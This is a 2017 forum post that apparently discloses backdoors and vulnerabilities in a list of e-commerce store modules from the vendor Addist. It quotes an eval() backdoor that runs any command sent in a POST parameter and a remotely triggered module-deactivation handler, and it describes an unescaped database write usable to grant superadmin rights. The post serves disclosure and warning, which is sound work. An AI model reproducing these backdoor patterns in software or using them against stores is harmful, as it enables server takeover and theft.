Post by RHCk » Mon Jan 23, 2017 4:43 am

We have found a critical vulnerability in the modules from Addist.

Modules:
Module_01
Module_02
Module_03
Module_04
Module_05
Module_06
Module_07
Module_08
Module_09
Module_10
Module_11
Module_12
Module_13
Module_14
Module_15
Module_16
Module_17

In the module files found:
1.

Code: Select all

@eval($this->request->post['command']);
Code allows on your server to execute any command using the eval() function.
If you have a modules from Addist, then get ftp access to your store is 5 seconds of time. Made this addict on purpose, or accidentally — doesn't matter. The fact that these modules were found to have nearly 1,000 owners of working shops.

2.

Code: Select all

if (!empty($this->request->get['deactivate']))
{
$this->cache->delete($this->request->get['deactivate']);
$this->config->remove($this->request->get['deactivate']);
}
Tool that allows you to enable or disable the module from addist also from the outside by remote command to the server. With this you can disable any modules.

3.
Image

No escaping when writing to the database, and if appropriate, to compile the data, with this bug you can make a request to the database store for example to add user rights superadmin, well and there already to catch full access to the shop is not a problem.

User avatar
Newbie

Posts

Joined
Mon Jan 23, 2017 4:19 am
Location - Moscow
Who is online

Users browsing this forum: No registered users and 39 guests